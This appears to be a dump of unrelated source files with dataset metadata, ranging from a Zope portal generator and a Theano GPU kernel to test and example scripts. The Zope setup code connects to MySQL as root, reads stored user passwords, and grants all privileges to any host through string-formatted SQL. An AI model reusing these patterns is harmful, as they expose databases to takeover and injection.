def setup( self, p, language, create_userfolder ):
"""
Setup portal object
"""
logger.info('Setup new ExpressSuite instance, id: %s, IsSQLCatalog: %s' % ( p.getId(), Config.IsSQLCatalog ) )
if Config.IsSQLCatalog:
id = Config.SQLDBConnectorID
addZMySQLConnection( p, id, 'Z MySQL Database Connection', 1 )
self.setupTools( p )
self.setupCatalog( p )
self.setupMessageCatalog( p, language )
self.setupMail( p )
if int(create_userfolder) != 0: self.setupUserFolder( p )
self.setupCookieAuth( p )
self.setupRoles( p )
self.setupPermissions( p )
self.setupDefaultSkins( p )
# SkinnedFolders are only for customization;
# they aren't a default type.
default_types = tuple( filter( lambda x: x['id'] != 'Skinned Folder', factory_type_information ) )
self.setupTypes( p, default_types )
self.setupTypes( p, cmf_factory_type_information )
self.setupCategories( p )
self.setupMimetypes( p )
self.setupWorkflow( p )
self.setupActions( p )
self.setupManual( p, 'manual' )
logger.info('Successfully created new instance')
def setupManual( self, target, path, ctype=None ):
"""
Setup manual
"""
createDirectoryView( target, makepath( path ) )
def create( self, parent, id, language, create_userfolder ):
"""
Creates an instance
"""
id = str(id)
portal = self.klass( id=id )
parent._setObject( id, portal )
# Return the fully wrapped object
p = parent.this()._getOb( id )
self.setup( p, language, create_userfolder )
return p
def setupDefaultProperties( self, p, id, title, description, email_from_address, email_from_name,
validate_email, server_url, stemmer ):
"""
Setup default portal properties
"""
p._setProperty( 'email_from_address', email_from_address, 'string' )
p._setProperty( 'email_from_name', email_from_name, 'string' )
p._setProperty( 'validate_email', validate_email and 1 or 0, 'boolean' )
p._setProperty( 'email_antispam', '', 'string' )
p._setProperty( 'email_error_address', '', 'string' )
p._setProperty( 'instance', id, 'string' )
p._setProperty( 'remote_url', '', 'string' )
p._setProperty( 'apply_threading', 1, 'boolean' )
p._setProperty( 'use_timeout', 1, 'boolean' )
p._setProperty( 'duration', 0.001, 'float' )
p._setProperty( 'p_resolve_conflict', 0, 'boolean' )
p._setProperty( 'max_involved_users', 10, 'int' )
p._setProperty( 'service_timeout', 30, 'int' )
p._setProperty( 'created_search_interval', 999, 'int' )
p._setProperty( 'common_url', '', 'string' )
p._setProperty( 'send_to_support', 0, 'boolean' )
p._setProperty( 'member_activity', 1, 'boolean' )
p._setProperty( 'emergency_service', 0, 'boolean' )
p._setProperty( 'p_log', 0, 'boolean' )
p._setProperty( 'suspended_mail', 1, 'boolean' )
p._setProperty( 'mail_frequency', 1, 'int' )
p._setProperty( 'mail_threshold', 500, 'int' )
p._setPropValue( 'server_url', server_url )
p._setPropValue( 'stemmer', stemmer )
p.title = title
p.description = description
def setupAfterCreate( self, p, create_userfolder ):
"""
Setup portal catalog and folders storage
"""
self.setupStorage( p, create_userfolder )
def _makeHeading( self, ob, id, title=None ):
"""
Creates Heading instance
"""
try:
folder = Heading( id=id, title=title )
if folder is not None:
ob._setObject( id, folder, set_owner=1 )
return 1
except:
raise
return 0
def addZMySQLConnection( dispatcher, id, title='', check=None ):
"""
Adds MySQL DB Connection
"""
connection_string = '-mysql root'
conn = SQLConnection( id, title, connection_string, check )
if conn.connected():
DB = conn._v_database_connection
if DB is not None and DB.is_opened():
instance = dispatcher.getId()
if instance:
DB.query( "CREATE DATABASE IF NOT EXISTS %s" % instance )
acl_users = aq_get(dispatcher, 'acl_users', None, 1)
if acl_users is not None:
userid = Config.SQLDBUser
user = acl_users.getUserById( userid )
                passwd = user.__  # old Zope user objects expose the stored password via the '__' attribute
servers = ( 'localhost', '%', )
for x in servers:
DB.query( "GRANT ALL PRIVILEGES ON %s.* TO '%s'@'%s' IDENTIFIED BY '%s' WITH GRANT OPTION" % ( \
instance, userid, x, passwd ) )
DB.query( "SET PASSWORD FOR '%s'@'%s' = OLD_PASSWORD('%s')" % ( \
userid, x, passwd ) )
DB.close()
if instance and userid:
connection_string = Config.connection_string % { \
'instance' : instance,
'user' : userid,
'passwd' : passwd
}
Publish.setupProduct( DB, connection_string, dispatcher )
dispatcher._setObject(id, conn)
def manage_addExpressSuiteForm( self ):
"""
Returns ExpressSuite instance generator form
"""
add_expresssuite_form = HTMLFile('dtml/addExpressSuite', globals())
all_languages = []
for lang, info in Config.Languages.items():
all_languages.append( {
'id' : lang,
'title' : info['title'],
'default' : lang == Config.DefaultLanguage,
} )
try:
from Products.TextIndexNG2 import allStemmers
all_stemmers = allStemmers(self)
except ImportError:
all_stemmers = []
return add_expresssuite_form( self, all_languages=all_languages, all_stemmers=all_stemmers )
#manage_addExpressSuiteForm.__name__ = 'addExpressSuite'
def manage_addExpressSuite( self, id='common', title='Express Suite DMS', description='',
create_userfolder=1,
email_from_address=None,
email_from_name=None,
validate_email=0,
language=None,
stemmer=None,
REQUEST=None
):
"""
Adds ExpressSuite instance
"""
id = id.strip()
server_url = self.getPhysicalRoot().absolute_url()
if email_from_address is None:
email_from_address = 'postmaster@%s' % urlparse( server_url )[1].split(':')[0]
if email_from_name is None:
email_from_name = title
gen = PortalGenerator()
p = gen.create( self, id, language, create_userfolder )
gen.setupDefaultProperties( p, id, title, description, email_from_address, email_from_name,
validate_email, server_url, stemmer )
gen.setupAfterCreate( p, create_userfolder )
if REQUEST is not None:
REQUEST.RESPONSE.redirect(p.absolute_url() + '/finish_site_construction')
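# Rough usage sketch (not part of the product code): creating an instance
# programmatically, e.g. from an external method or a debug prompt. The
# application-root name and argument values below are illustrative only.
#
#   manage_addExpressSuite(app, id='dms', title='Express Suite DMS',
#                          language='ru', create_userfolder=1)
#
# Through the ZMI the same parameters are collected by manage_addExpressSuiteForm
# and then passed on to manage_addExpressSuite.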
| [
"[email protected]"
] | |
bebb7ac47a7598ad344f55ae7d57daba858e56ea | c07380914a44df334194f234c33858f357365c19 | /ENV/lib/python2.7/site-packages/theano/sandbox/gpuarray/neighbours.py | 1f0c7529213f8f6c6d23f989bd3a641915b97fa9 | [] | no_license | damianpolan/Music-Genre-Classification | 318952ae7de5d0b0bdf5676e28071c7b38d0e1c5 | acd723ae1432ce798866ebb97ef3c484db37e971 | refs/heads/master | 2022-12-24T09:23:55.514337 | 2016-03-22T14:49:28 | 2016-03-22T14:49:28 | 42,965,899 | 4 | 4 | null | 2022-12-12T20:26:24 | 2015-09-22T23:05:37 | Python | UTF-8 | Python | false | false | 18,919 | py | import numpy
from theano import Op, Apply, config
from theano.gof import local_optimizer
from theano.tensor.nnet.neighbours import Images2Neibs
import theano.tensor as T
try:
import pygpu
from pygpu import gpuarray, elemwise
except ImportError:
pass
from theano.sandbox.gpuarray.basic_ops import (as_gpuarray_variable,
host_from_gpu, gpu_from_host)
from theano.sandbox.gpuarray.opt import register_opt as register_gpu_opt
from theano.sandbox.gpuarray.opt import op_lifter
from theano.sandbox.gpuarray.type import GpuArrayType
from theano.sandbox.gpuarray.comp import NVCC_compiler
class GpuImages2Neibs(Images2Neibs, Op):
def __init__(self, mode='valid'):
if mode not in ['valid', 'ignore_borders', 'wrap_centered']:
raise NotImplementedError("Only the mode valid, ignore_borders"
" and wrap_centered"
" have been implemented for the op"
" GpuImages2Neibs")
self.mode = mode
def make_node(self, ten4, neib_shape, neib_step):
ten4 = as_gpuarray_variable(ten4)
neib_shape = T.as_tensor_variable(neib_shape)
neib_step = T.as_tensor_variable(neib_step)
assert ten4.ndim == 4
assert neib_shape.ndim == 1
assert neib_step.ndim == 1
assert "int" in neib_shape.dtype
assert "int" in neib_step.dtype
return Apply(self, [ten4, neib_shape, neib_step],
[GpuArrayType(broadcastable=(False, False),
dtype=ten4.type.dtype)()])
def c_code_cache_version(self):
return (9,1)
def c_headers(self):
return ['cuda.h', '<gpuarray/extension.h>', '<numpy_compat.h>',
'<gpuarray/ext_cuda.h>']
def c_compiler(self):
return NVCC_compiler
def c_init_code(self):
return ['setup_ext_cuda();']
def c_support_code_apply(self, node, nodename):
dtype_ten4 = node.inputs[0].dtype
dtype_z = node.outputs[0].dtype
mode = self.mode
return """
//a version that use less register but don't work in all case.
static __global__ void k_multi_warp_less_%(nodename)s(
const int nb_batch,
const int nb_stack,
const int height,
const int width,
const int c,
const int d,
const int step_x,
const int step_y,
const int grid_c,
const int grid_d,
const int stride0, const int stride1,
const int stride2, const int stride3,
npy_%(dtype_ten4)s * global_ten4,
const int out_s0, const int out_s1,
npy_%(dtype_z)s * global_out
)
{
const int wrap_centered_idx_shift_x = c/2;
const int wrap_centered_idx_shift_y = d/2;
for(int tblock = blockIdx.x*blockDim.z+threadIdx.z;
tblock<nb_batch*nb_stack*grid_c*grid_d;
tblock+=gridDim.x*blockDim.z){
const int b = tblock%%grid_d;
int left = tblock/grid_d;
const int a = left%%grid_c;
left = left/grid_c;
const int s = left%%nb_stack;
left = left/nb_stack;
const int n = left;
if(n>nb_batch)continue;
if(s>nb_stack)continue;
if(a>grid_c)continue;
if(b>grid_d)continue;
int z_row = b + grid_d*(a + grid_c*
(s + nb_stack*n));
int i = threadIdx.y; // loop over c
{
int ten4_2 = i + a * step_x;
if("%(mode)s"=="wrap_centered"){
ten4_2 -= wrap_centered_idx_shift_x;
if ( ten4_2 < 0 )
ten4_2 += height;
else if (ten4_2 >= height)
ten4_2 -= height;
}
int j = threadIdx.x; // loop over d
{
int ten4_3 = j + b * step_y;
if("%(mode)s"=="wrap_centered"){
ten4_3 -= wrap_centered_idx_shift_y;
if ( ten4_3 < 0 )
ten4_3 += width;
else if (ten4_3 >= width)
ten4_3 -= width;
}
int ten4_idx = stride3*ten4_3 +
stride2*ten4_2 +
stride1*s + stride0*n;
int z_col = j + d * i;
int z_idx = z_col * out_s1 +
z_row * out_s0;
global_out[z_idx] = global_ten4[ten4_idx];
}
}
}
}
static __global__ void k_multi_warp_%(nodename)s(
const int nb_batch,
const int nb_stack,
const int height,
const int width,
const int c,
const int d,
const int step_x,
const int step_y,
const int grid_c,
const int grid_d,
const int stride0, const int stride1,
const int stride2, const int stride3,
npy_%(dtype_ten4)s * global_ten4,
const int out_s0, const int out_s1,
npy_%(dtype_z)s * global_out
)
{
const int wrap_centered_idx_shift_x = c/2;
const int wrap_centered_idx_shift_y = d/2;
for(int tblock = blockIdx.x*blockDim.z+threadIdx.z;
tblock<nb_batch*nb_stack*grid_c*grid_d;
tblock+=gridDim.x*blockDim.z){
const int b = tblock%%grid_d;
int left = tblock/grid_d;
const int a = left%%grid_c;
left = left/grid_c;
const int s = left%%nb_stack;
left = left/nb_stack;
const int n = left;
if(n>nb_batch)continue;
if(s>nb_stack)continue;
if(a>grid_c)continue;
if(b>grid_d)continue;
int z_row = b + grid_d*(a + grid_c*
(s + nb_stack*n));
// loop over c
for (int i = threadIdx.y; i < c; i+=blockDim.y)
{
int ten4_2 = i + a * step_x;
if("%(mode)s"=="wrap_centered"){
ten4_2 -= wrap_centered_idx_shift_x;
if ( ten4_2 < 0 )
ten4_2 += height;
else if (ten4_2 >= height)
ten4_2 -= height;
}
// loop over d
for (int j = threadIdx.x; j < d; j+=blockDim.x)
{
int ten4_3 = j + b * step_y;
if("%(mode)s"=="wrap_centered"){
ten4_3 -= wrap_centered_idx_shift_y;
if ( ten4_3 < 0 )
ten4_3 += width;
else if (ten4_3 >= width)
ten4_3 -= width;
}
int ten4_idx = stride3*ten4_3 +
stride2*ten4_2 +
stride1*s + stride0*n;
int z_col = j + d * i;
int z_idx = z_col * out_s1 +
z_row * out_s0;
global_out[z_idx] = global_ten4[ten4_idx];
}
}
}
}
""" % locals()
def c_code(self, node, name, inp, out, sub):
dtype_ten4 = node.inputs[0].dtype
dtype_neib_shape = node.inputs[1].dtype
dtype_neib_step = node.inputs[2].dtype
dtype_z = node.outputs[0].dtype
itemsize_ten4 = numpy.dtype(dtype_ten4).itemsize
itemsize_z = numpy.dtype(dtype_z).itemsize
typecode_z = pygpu.gpuarray.dtype_to_typecode(node.outputs[0].dtype)
ten4, neib_shape, neib_step = inp
z, = out
fail = sub['fail']
mode = self.mode
if config.gpuarray.sync:
cnda_thread_sync = "GpuArray_sync(&%(z)s->ga);" % dict(z=z)
else:
cnda_thread_sync = ""
return """
#ifndef CEIL_INTDIV
#define CEIL_INTDIV(a, b) ((a/b) + ((a %% b) ? 1: 0))
#endif
int grid_c = -1;
int grid_d = -1;
{
if (PyGpuArray_NDIM(%(ten4)s) != 4)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: pvals wrong rank");
%(fail)s;
}
if (PyArray_NDIM(%(neib_shape)s) != 1)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: unis wrong rank");
%(fail)s;
}
if (PyArray_DIMS(%(neib_shape)s)[0] != 2)
{
PyErr_Format(PyExc_ValueError,
"GpuImages2Neibs: neib_shape has to contain two"
" elements");
%(fail)s;
}
const int c = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 0);
const int d = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 1);
const npy_intp step_x = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 0);
const npy_intp step_y = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 1);
if ( "%(mode)s" == "wrap_centered") {
if (c%%2!=1 || d%%2!=1){
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: in mode wrap_centered need patch with odd shapes");
%(fail)s;
}
if ( PyGpuArray_DIMS(%(ten4)s)[2] < c ||
PyGpuArray_DIMS(%(ten4)s)[3] < d)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: in wrap_centered mode,"
" don't support image shapes smaller then"
" the patch shapes: neib_shape=(%%d,%%d),"
" ten4[2:]=[%%d,%%d]",
c, d, PyGpuArray_DIMS(%(ten4)s)[2],
PyGpuArray_DIMS(%(ten4)s)[3]);
%(fail)s;
}
grid_c = CEIL_INTDIV(((PyGpuArray_DIMS(%(ten4)s))[2]),
step_x);
grid_d = CEIL_INTDIV(((PyGpuArray_DIMS(%(ten4)s))[3]),
step_y);
}else if ( "%(mode)s" == "valid") {
if ( ((PyGpuArray_DIMS(%(ten4)s))[2] < c) ||
((((PyGpuArray_DIMS(%(ten4)s))[2]-c) %% step_x)!=0))
{
PyErr_Format(PyExc_TypeError, "GpuImages2Neibs:"
" neib_shape[0]=%%d, neib_step[0]=%%d and"
" ten4.shape[2]=%%d not consistent",
c, step_x,
PyGpuArray_DIMS(%(ten4)s)[2]);
%(fail)s;
}
if ( ((PyGpuArray_DIMS(%(ten4)s))[3] < d) ||
((((PyGpuArray_DIMS(%(ten4)s))[3]-d) %% step_y)!=0))
{
PyErr_Format(PyExc_TypeError, "GpuImages2Neibs:"
" neib_shape[1]=%%d, neib_step[1]=%%d and"
" ten4.shape[3]=%%d not consistent",
d, step_y,
PyGpuArray_DIMS(%(ten4)s)[3]);
%(fail)s;
}
//number of patch in height
grid_c = 1+(((PyGpuArray_DIMS(%(ten4)s))[2]-c)/step_x);
//number of patch in width
grid_d = 1+(((PyGpuArray_DIMS(%(ten4)s))[3]-d)/step_y);
}else if ( "%(mode)s" == "ignore_borders") {
//number of patch in height
grid_c = 1+(((PyGpuArray_DIMS(%(ten4)s))[2]-c)/step_x);
//number of patch in width
grid_d = 1+(((PyGpuArray_DIMS(%(ten4)s))[3]-d)/step_y);
}else{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs:: unknown mode '%(mode)s'");
%(fail)s;
}
// new dimensions for z
const int z_dim1 = c * d;
const int z_dim0 = grid_c
* grid_d
* PyGpuArray_DIMS(%(ten4)s)[1]
* PyGpuArray_DIMS(%(ten4)s)[0];
if ((NULL == %(z)s)
|| (PyGpuArray_DIMS(%(z)s)[0] != z_dim0)
|| (PyGpuArray_DIMS(%(z)s)[1] != z_dim1))
{
Py_XDECREF(%(z)s);
size_t dims[2];
dims[0] = z_dim0;
dims[1] = z_dim1;
%(z)s = pygpu_empty(2, dims, %(typecode_z)s,
GA_C_ORDER, pygpu_default_context(),
Py_None);
if (!%(z)s)
{
PyErr_SetString(PyExc_MemoryError, "GpuImages2Neibs:"
" failed to alloc z output");
%(fail)s;
}
}
}
{ // NESTED SCOPE
const int nb_batch = PyGpuArray_DIMS(%(ten4)s)[0];
const int nb_stack = PyGpuArray_DIMS(%(ten4)s)[1];
const int height = PyGpuArray_DIMS(%(ten4)s)[2];
const int width = PyGpuArray_DIMS(%(ten4)s)[3];
const int c = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 0);
const int d = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 1);
const npy_intp step_x = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 0);
const npy_intp step_y = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 1);
dim3 n_threads(d,c,1);
            // There is a max of 512 threads per block
while(n_threads.x*n_threads.y>512 && n_threads.y>1)n_threads.y--;
while(n_threads.x*n_threads.y>512 && n_threads.x>1)n_threads.x--;
            // For smaller patch sizes, use a bigger block to get a better
            // memory access pattern and higher core utilisation.
while(c*d*(n_threads.z+1) < 128 && n_threads.z<64 &&
n_threads.z<PyGpuArray_DIMS(%(z)s)[0]){
n_threads.z++;
}
int nb_block;
if (PyGpuArray_DIMS(%(z)s)[0] %% n_threads.z == 0)
nb_block = PyGpuArray_DIMS(%(z)s)[0] / n_threads.z;
else
nb_block = (PyGpuArray_DIMS(%(z)s)[0] / n_threads.z) + 1;
dim3 n_blocks(std::min(32*1024,nb_block));
int n_shared = 0;
void (*f)(int, int, int ,int,
int, int, int ,int,
int, int,
int, int, int, int,
npy_%(dtype_ten4)s*,
int, int,
npy_%(dtype_z)s*);
if(n_threads.x==d && n_threads.y==c){
f = k_multi_warp_less_%(name)s;
}else{
f = k_multi_warp_%(name)s;
}
f<<<n_blocks, n_threads, n_shared>>>(
nb_batch,
nb_stack,
height, width,
c, d, step_x, step_y,
grid_c, grid_d,
PyGpuArray_STRIDES(%(ten4)s)[0] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[1] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[2] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[3] / %(itemsize_ten4)s,
(npy_%(dtype_ten4)s*)(
((char *)cuda_get_ptr(%(ten4)s->ga.data)) +
%(ten4)s->ga.offset),
PyGpuArray_STRIDES(%(z)s)[0] / %(itemsize_z)s,
PyGpuArray_STRIDES(%(z)s)[1] / %(itemsize_z)s,
(npy_%(dtype_z)s*)(((char *)cuda_get_ptr(%(z)s->ga.data)) +
%(z)s->ga.offset)
);
%(cnda_thread_sync)s
cudaError_t sts = cudaGetLastError();
if (cudaSuccess != sts)
{
PyErr_Format(PyExc_RuntimeError, "GpuImages2Neibs:"
" Cuda error: %%s: %%s. (grid: %%i x %%i;"
" block: %%i x %%i x %%i; shared: %%i)\\n",
"k_multi_warp_%(name)s",
cudaGetErrorString(sts),
n_blocks.x,
n_blocks.y,
n_threads.x,
n_threads.y,
n_threads.z,
n_shared);
%(fail)s;
}
} // END NESTED SCOPE
""" % locals()
@op_lifter([Images2Neibs])
def use_gpu_images2neibs(node):
if node.op.mode in ['valid', 'ignore_borders', 'wrap_centered']:
return GpuImages2Neibs(node.op.mode)
register_gpu_opt()(use_gpu_images2neibs)
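# Rough usage sketch (assumes a working CUDA/pygpu setup; shapes and mode are
# illustrative). The graph is built with the generic images2neibs op from
# theano.tensor.nnet.neighbours; the optimizer registered above then swaps in
# GpuImages2Neibs when the computation is moved to the gpuarray backend.
#
#   import theano
#   import theano.tensor as T
#   from theano.tensor.nnet.neighbours import images2neibs
#
#   ten4 = T.tensor4('ten4')
#   neibs = images2neibs(ten4, neib_shape=(5, 5), mode='valid')
#   f = theano.function([ten4], neibs)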
| [
"[email protected]"
] | |
8cfd3c66b9a03394e87c6cbbac0e72ae02d96b6b | 77ae7c76d36009daa01b2317439c1f975f7932b2 | /exercicios/ex115/arquivo.py | dbcbd133583ca6ae2edba87857cfb65ef4e83003 | [] | no_license | MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video | 5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2 | 5696c49d3caf5cae817217a2da0598d1cf794f5b | refs/heads/master | 2022-03-22T10:49:33.666660 | 2019-11-25T21:24:43 | 2019-11-25T21:24:43 | 224,052,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | def verPessoas():
print('-' * 30)
arq = open('lista.txt', 'r')
print(arq.read())
arq.close()
def adicionarPessoas():
print('-' * 30)
arq = open('lista.txt', 'a')
nome = str(input('Nome: ')).strip().capitalize()
válido = False
while True:
try:
idade = int(input('Idade: '))
except:
print('\033[31mERRO: por favor, digite um número inteiro válido.\033[m')
else:
print(f'Novo registro de {nome} adicionado')
arq.write(f'\n{nome:<30}{idade} anos')
válido = True
if válido:
break
arq.close()
| [
"[email protected]"
] | |
a1900950b36a1a0eeada9e202f153c8985039b65 | e342abb1306e4b083f235a2992ffb863c96c9a86 | /examples/user/user_playlists.py | f71f755bceeeb2c38e3122cc3e6f50cb403624cb | [
"MIT"
] | permissive | LorenzoCavatorta/spotify.py | 102422e6588cb6c49cff026562e37f28cb0650eb | 7f375f030fbac4ef3dbbd577a898b4d72f37b72b | refs/heads/master | 2020-08-01T17:09:06.795264 | 2019-09-30T12:24:57 | 2019-09-30T12:24:57 | 211,055,943 | 0 | 0 | MIT | 2019-09-26T09:50:46 | 2019-09-26T09:50:46 | null | UTF-8 | Python | false | false | 453 | py | import asyncio
import spotify
client = spotify.Client('someid', 'somesecret')
async def main():
# You can use a user with a http presence
user = await client.user_from_token('sometoken')
# Or you can get a generic user
    user = await client.get_user('someuserid')
# returns a list of spotify.Playlist objects
playlists = await user.get_playlists()
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
| [
"[email protected]"
] | |
b0e487b584903313154d9dd72e6c085f2b3b95d9 | 4664328482163fd927603d66f47209b28471cf0f | /venv/lib/python3.7/site-packages/datalad/metadata/extractors/tests/test_datacite_xml.py | 30ed2525d0915a74e0f941dc65be94d72cbe0d4c | [
"MIT"
] | permissive | emmetaobrien/dats-validator | 08706ddab795d272391b3611cd3ba0de8c4a91a1 | fb25f97a32119c2bce4eb50dc080a93d5ee77141 | refs/heads/master | 2020-12-19T05:03:17.179117 | 2020-01-22T17:28:38 | 2020-01-22T17:28:38 | 235,626,049 | 0 | 0 | MIT | 2020-01-22T17:24:56 | 2020-01-22T17:24:56 | null | UTF-8 | Python | false | false | 2,982 | py | # emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test datacite metadata extractor """
from simplejson import dumps
from datalad.metadata.extractors.datacite import MetadataExtractor
from datalad.metadata.metadata import _get_metadatarelevant_paths
from nose.tools import assert_equal
from datalad.tests.utils import with_tree
from datalad.api import create
xml_content = """\
<?xml version="1.0" encoding="UTF-8"?>
<resource xmlns="http://datacite.org/schema/kernel-2.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://datacite.org/schema/kernel-2.2 http://schema.datacite.org/meta/kernel-2.2/metadata.xsd">
<identifier identifierType="DOI">10.6080/K0QN64NG</identifier>
<creators>
<creator>
<creatorName>Last1, First1</creatorName>
</creator>
<creator>
<creatorName>Last2, First2</creatorName>
</creator>
</creators>
<titles>
<title>Main
title</title>
<title titleType="AlternativeTitle">CRCNS.org xxx-1</title>
</titles>
<publisher>CRCNS.org</publisher>
<publicationYear>2011</publicationYear>
<subjects>
<subject>Neuroscience</subject>
<subject>fMRI</subject>
</subjects>
<language>eng</language>
<resourceType resourceTypeGeneral="Dataset">Dataset/Neurophysiology</resourceType>
<sizes>
<size>10 GB</size>
</sizes>
<formats>
<format>application/matlab</format>
<format>NIFTY</format>
</formats>
<version>1.0</version>
<descriptions>
<description descriptionType="Other">
Some long
description.
</description>
</descriptions>
<relatedIdentifiers>
<relatedIdentifier relatedIdentifierType="DOI" relationType="IsDocumentedBy">10.1016/j.cub.2011.08.031</relatedIdentifier>
</relatedIdentifiers>
</resource>
"""
@with_tree(tree={'.datalad': {'meta.datacite.xml': xml_content}})
@with_tree(tree={'elsewhere': {'meta.datacite.xml': xml_content}})
def test_get_metadata(path1, path2):
for p in (path1, path2):
print('PATH')
ds = create(p, force=True)
ds.add('.')
meta = MetadataExtractor(
ds,
_get_metadatarelevant_paths(ds, []))._get_dataset_metadata()
assert_equal(
dumps(meta, sort_keys=True, indent=2),
"""\
{
"author": [
"Last1, First1",
"Last2, First2"
],
"citation": [
"10.1016/j.cub.2011.08.031"
],
"description": "Some long description.",
"formats": [
"application/matlab",
"NIFTY"
],
"name": "CRCNS.org xxx-1",
"sameas": "10.6080/K0QN64NG",
"shortdescription": "Main title",
"tag": [
"Neuroscience",
"fMRI"
],
"version": "1.0"
}""")
| [
"[email protected]"
] | |
59fbf899cb91638c4c208f659ae96a918d587461 | 8acffb8c4ddca5bfef910e58d3faa0e4de83fce8 | /ml-flask/Lib/site-packages/nltk/cluster/__init__.py | 38a9111e2204c7174d3bfbd82559e79570513835 | [
"MIT"
] | permissive | YaminiHP/SimilitudeApp | 8cbde52caec3c19d5fa73508fc005f38f79b8418 | 005c59894d8788c97be16ec420c0a43aaec99b80 | refs/heads/master | 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:59aceae689404a10cc3a170d5442209edea3f051e4f50c800fa557e86d234639
size 4271
| [
"[email protected]"
] | |
ad880090cfa86821407e0941820ac38bb2b6257a | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/cherrypy/cherrypy/lib/static.py | 730d86b5c8aca8450f7467f6e5d78d45615cc9e1 | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/cherrypy/cherrypy/lib/static.py | [
"[email protected]"
] | |
351b4eddb3f58e872e3497a9bea27b19aa4d720f | 4d89652acca24e0bc653e0b4cb5846ceb5b568e4 | /google-cloud-sdk/lib/surface/run/domain_mappings/list.py | ab9c9af7d8e8d0e25820072bf29df8501224e959 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | ibssasimon/LyricLingo | 410fcec94d2bd3ea75c975c55713f5b8fb913229 | 0dfc951b270912470b36ce0083afd9d4fe41b10a | refs/heads/master | 2021-06-25T10:00:18.215900 | 2020-01-09T00:35:46 | 2020-01-09T00:35:46 | 222,135,399 | 2 | 1 | null | 2021-04-30T20:54:14 | 2019-11-16T17:32:19 | Python | UTF-8 | Python | false | false | 3,061 | py | # -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for listing all domain mappings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.run import commands
from googlecloudsdk.command_lib.run import connection_context
from googlecloudsdk.command_lib.run import flags
from googlecloudsdk.command_lib.run import pretty_print
from googlecloudsdk.command_lib.run import resource_args
from googlecloudsdk.command_lib.run import serverless_operations
from googlecloudsdk.command_lib.util.concepts import concept_parsers
from googlecloudsdk.command_lib.util.concepts import presentation_specs
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class List(commands.List):
"""Lists domain mappings."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To list all Cloud Run domain mappings, run:
$ {command}
""",
}
@classmethod
def CommonArgs(cls, parser):
# Flags specific to connecting to a cluster
cluster_group = flags.GetClusterArgGroup(parser)
namespace_presentation = presentation_specs.ResourcePresentationSpec(
'--namespace',
resource_args.GetNamespaceResourceSpec(),
'Namespace to list domain mappings in.',
required=True,
prefixes=False)
concept_parsers.ConceptParser(
[namespace_presentation]).AddToParser(cluster_group)
parser.display_info.AddFormat(
"""table(
{ready_column},
metadata.name:label=DOMAIN,
route_name:label=SERVICE,
region:label=REGION)""".format(ready_column=pretty_print.READY_COLUMN))
parser.display_info.AddUriFunc(cls._GetResourceUri)
@classmethod
def Args(cls, parser):
cls.CommonArgs(parser)
def Run(self, args):
"""List available domain mappings."""
conn_context = connection_context.GetConnectionContext(
args, self.ReleaseTrack())
namespace_ref = args.CONCEPTS.namespace.Parse()
with serverless_operations.Connect(conn_context) as client:
self.SetCompleteApiEndpoint(conn_context.endpoint)
return commands.SortByName(client.ListDomainMappings(namespace_ref))
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class AlphaList(List):
"""Lists domain mappings."""
@classmethod
def Args(cls, parser):
cls.CommonArgs(parser)
AlphaList.__doc__ = List.__doc__
| [
"[email protected]"
] | |
